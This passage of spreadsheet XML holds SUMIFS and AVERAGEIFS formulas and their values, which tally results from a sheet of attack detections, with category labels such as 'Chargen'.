      <c r="FC41" s="334" t="s">
        <v>2452</v>
      </c>
      <c r="FD41" s="335" t="s">
        <v>2453</v>
      </c>
      <c r="FE41" s="336">
        <f>FZ28</f>
        <v>0.04393441684</v>
      </c>
      <c r="FF41" s="336">
        <f>FZ29</f>
        <v>0.2177240228</v>
      </c>
      <c r="FG41" s="336">
        <f>FZ30</f>
        <v>0.3773692556</v>
      </c>
      <c r="FH41" s="425">
        <f>FZ31</f>
        <v>0.4277893364</v>
      </c>
      <c r="FK41" s="426" t="s">
        <v>2488</v>
      </c>
      <c r="FL41" s="427">
        <f t="shared" ref="FL41:FO41" si="26">FL40/EJ43</f>
        <v>1</v>
      </c>
      <c r="FM41" s="427">
        <f t="shared" si="26"/>
        <v>0.9347826087</v>
      </c>
      <c r="FN41" s="427">
        <f t="shared" si="26"/>
        <v>0.9155405405</v>
      </c>
      <c r="FO41" s="427">
        <f t="shared" si="26"/>
        <v>0.627480916</v>
      </c>
      <c r="FP41" s="392"/>
      <c r="FQ41" s="392"/>
      <c r="FR41" s="392"/>
      <c r="FS41" s="392"/>
      <c r="FT41" s="392"/>
      <c r="FU41" s="392"/>
      <c r="FV41" s="392"/>
      <c r="FW41" s="392"/>
      <c r="FX41" s="392"/>
      <c r="FY41" s="392"/>
      <c r="FZ41" s="392"/>
      <c r="GA41" s="392"/>
      <c r="GB41" s="392"/>
      <c r="GC41" s="392"/>
      <c r="GD41" s="392"/>
      <c r="GE41" s="392"/>
      <c r="GF41" s="392"/>
      <c r="GG41" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="GH41" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GI41" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GJ41" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GK41" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="GL41" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GM41" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GN41" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GO41" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="GP41" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GQ41" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GR41" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GS41" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="GT41" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GU41" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GV41" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG41)</f>
        <v>0</v>
      </c>
      <c r="GW41" s="392"/>
      <c r="GX41" s="392"/>
      <c r="GY41" s="392"/>
      <c r="GZ41" s="392"/>
      <c r="HA41" s="392"/>
      <c r="HB41" s="392"/>
      <c r="HC41" s="392"/>
      <c r="HD41" s="392"/>
      <c r="HE41" s="392"/>
      <c r="HF41" s="392"/>
      <c r="HG41" s="392"/>
      <c r="HH41" s="392"/>
      <c r="HI41" s="392"/>
      <c r="HJ41" s="392"/>
      <c r="HK41" s="392"/>
      <c r="HL41" s="392"/>
      <c r="HM41" s="392"/>
      <c r="HN41" s="392"/>
      <c r="HO41" s="392"/>
      <c r="HP41" s="392"/>
    </row>
    <row r="42">
      <c r="B42" s="277"/>
      <c r="C42" s="271"/>
      <c r="D42" s="271"/>
      <c r="E42" s="271"/>
      <c r="F42" s="271"/>
      <c r="G42" s="278"/>
      <c r="J42" s="277"/>
      <c r="K42" s="386" t="s">
        <v>2489</v>
      </c>
      <c r="L42" s="387" t="s">
        <v>2490</v>
      </c>
      <c r="M42" s="387" t="s">
        <v>2491</v>
      </c>
      <c r="N42" s="388" t="s">
        <v>2492</v>
      </c>
      <c r="O42" s="278"/>
      <c r="Q42" s="271"/>
      <c r="R42" s="386" t="s">
        <v>2485</v>
      </c>
      <c r="S42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="T42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>104</v>
      </c>
      <c r="V42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="W42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>571</v>
      </c>
      <c r="AA42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>140</v>
      </c>
      <c r="AB42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="AC42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="AD42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE42" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AF42" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG42" s="271"/>
      <c r="AH42" s="386" t="s">
        <v>2485</v>
      </c>
      <c r="AI42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>22</v>
      </c>
      <c r="AJ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>101</v>
      </c>
      <c r="AR42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>9</v>
      </c>
      <c r="AY42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2</v>
      </c>
      <c r="BO42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>10</v>
      </c>
      <c r="BR42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>3</v>
      </c>
      <c r="CP42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>1</v>
      </c>
      <c r="CQ42" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EI3:$EI139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
